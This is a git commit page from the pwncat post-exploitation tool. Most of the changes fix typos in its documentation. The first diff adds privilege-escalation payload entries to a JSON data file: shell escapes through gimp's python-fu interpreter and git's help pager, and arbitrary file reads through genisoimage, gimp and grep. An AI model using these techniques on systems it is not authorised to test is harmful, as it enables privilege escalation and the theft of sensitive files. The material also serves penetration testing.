1
0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-12-11 17:34:19 +01:00

Merge branch 'master' of github.com:calebstewart/pwncat

This commit is contained in:
Caleb Stewart 2020-05-21 00:05:05 -04:00
commit 94ea7ea969
8 changed files with 69 additions and 11 deletions

View File

@ -800,6 +800,64 @@
"args": ["open", "-e", "'{cat} {lfile}'", "rdoc"]
}
],
//-------------------------------------------------------------------
"genisoimage": [
{
"type": "read",
"stream" : "print",
"payload": "{command} -q -o - {lfile} | {tail} -c +49152",
"args": []
}
],
//-------------------------------------------------------------------
"gimp": [
{
"type": "shell",
"payload": "{command}",
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import os; os.system(\"{shell} -p\");gimp.exit()'"],
"exit": "exit"
},
{
"type": "read",
"stream": "raw",
"payload": "{command} 2>/dev/null",
"args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys; sys.stdout.write(open(\"{lfile}\",\"rb\").read());gimp.exit()'"]
}
// This 'write' technique seems to fail because it cannot capture stdin, being a "subprocess".
// Since it can get a shell, this is not really an issue.
// {
// "type": "write",
// "stream":"raw",
// "payload": "{command} 2>/dev/null",
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'import sys, shutil; shutil.copyfileobj(sys.stdin.buffer, open(\"{lfile}\",\"wb\"),length={length});gimp.exit()'"]
// },
// {
// "type": "write",
// "stream":"base64",
// "payload": "{command} 2>/dev/null",
// "args": ["-idf", "--batch-interpreter=python-fu-eval", "-b", "'exec(\"\"\"import sys,base64\\nwith open(\"{lfile}\",\"wb\") as f:\\n\\tfor chunk in iter(lambda: sys.stdin.read(4), b\"\"):\\n\\t\\tf.write(base64.b64decode(chunk))\"\"\")\\ngimp.exit()'"]
// }
],
//-------------------------------------------------------------------
"git": [
{
"type": "shell",
"payload": "{command}",
"args": ["help", "config"],
"input": "!{shell}\n",
"exit": "exit\nq\n"
}
],
//-------------------------------------------------------------------
"grep": [
{
"type": "read",
"stream":"print",
"payload": "{command}",
"args": ["''", "{lfile}"]
}
],

View File

@ -3,7 +3,7 @@ API Documentation
``pwncat`` is fully usable without modification, but also provides a scriptable method of interacting
with the remote host. A large variety of interaction with the remote host has been abstracted to
make interaction via python seemless. This is beneficial both for implementing simple ``pwncat``
make interaction via Python seamless. This is beneficial both for implementing simple ``pwncat``
prompt commands or more complicated privilege escalation or persistence methods.
.. toctree::

View File

@ -9,7 +9,7 @@ the ``pwncat/privesc`` directory.
Methods vs Techniques
---------------------
Privelege escalation methods may implement multiple techniques. Techniques represent a single action
Privilege escalation methods may implement multiple techniques. Techniques represent a single action
which a specific privilege escalation method can perform. Each technique is identified by it's method,
the user which the action can be performed as, a Capability and some method specific data.

View File

@ -24,7 +24,7 @@ processes output. If ``delim`` is false, this is equivalent to sending the comma
directly with ``pwncat.victim.client.send("ls\n".encode("utf-8"))``. However, setting ``delim`` to
True (the default value) instructs the method to prepend and append delimeters. ``process`` will
also wait for the starting delimeter to be sent before returning. This means that with ``delim``
on, reading data from ``pwncat.victim.client`` after calling process with be the output of the process
on, reading data from ``pwncat.victim.client`` after calling ``process`` will be the output of the process
up until the end delimeter.
The next process creation method is ``run``. This method utilizes ``process``, but automatically waits
@ -83,7 +83,7 @@ interface, uploading a local file to a remote file can be accomplished with Pyth
import os
import shutil
with open("loca-file", "rb") as src:
with open("local-file", "rb") as src:
with pwncat.victim.open("/tmp/remote-file", "wb",
length=os.path.getsize("local-file")) as dst:
shutil.copyfileobj(src, dst)
@ -111,7 +111,7 @@ auto-start, starting, stopping and creation of remote services.
To query a list of remote services, you can use the ``pwncat.victim.services`` property. This is an iterator
yielding each abstracted service object. Each object contains a name, description, and state as well as
methods for starting, stopping, enabling or disabling the service. This functionality obviously depends
on you having the correct permission to manage the services, however retrieve the state and list of
on you having the correct permission to manage the services, however retrieving the state and list of
services should work regardless of your permission level.
.. code-block:: python
@ -122,7 +122,7 @@ services should work regardless of your permission level.
print(f"{service.name} is {'running' if service.running else 'stopped'}")
To find a specific service by name, there is a ``find_service`` method which returns an individual
remote service object. If the service is not found, a ValueError is raised.
remote service object. If the service is not found, a ``ValueError`` is raised.
.. code-block:: python

View File

@ -47,7 +47,7 @@ you can use the "--password/-p" parameter:
.. code-block:: bash
set -p bob "b0b5_P@ss0rd"
set -p bob "b0b5_P@ssw0rd"
Key Bindings
------------

View File

@ -13,7 +13,7 @@ available on the target system. It will then attempt to start a pseudoterminal
on the remote host and provide you with raw terminal access.
pwncat doesn't stop there, though. On top of raw terminal access, pwncat can
programatically interact with the remote host alongside your terminal access.
programmatically interact with the remote host alongside your terminal access.
pwncat provides you with a local shell interface which can utilize your
connection for enumeration, file upload/download, automatic persistence
installation and even automated privilege escalation.
@ -39,7 +39,7 @@ reverse shells. It normally goes something like this:
# You now have a full terminal that doesn't exit on C-c
remote$
This works well. However, the added steps to get a reverse shell are laberous
This works well. However, the added steps to get a reverse shell are laborious
after a while. Also, the danger of losing your remote shell by accidentally
pressing "C-c" prior to gaining raw access is high. This was the original
inspiration of this project.

View File

@ -5,7 +5,7 @@ Installation
:maxdepth: -1
The only system dependency for ``pwncat`` is ``python3`` and ``pip``. For ``pip`` to install all Python dependencies,
you will likely need your distributions Python Development package (``python3-dev`` for debian-based distributions).
you will likely need your distributions Python Development package (``python3-dev`` for Debian-based distributions).
Once you have a working ``pip`` installation, you can install ``pwncat`` with the provided setup script:
.. code-block:: bash

View File

@ -502,7 +502,7 @@ class Victim:
:return: The full path to the requested binary or None if it was not found.
"""
if self.has_busybox:
if self.host.busybox is not None:
if name in self.busybox_provides:
if quote:
return f"{shlex.quote(str(self.busybox_path))} {name}"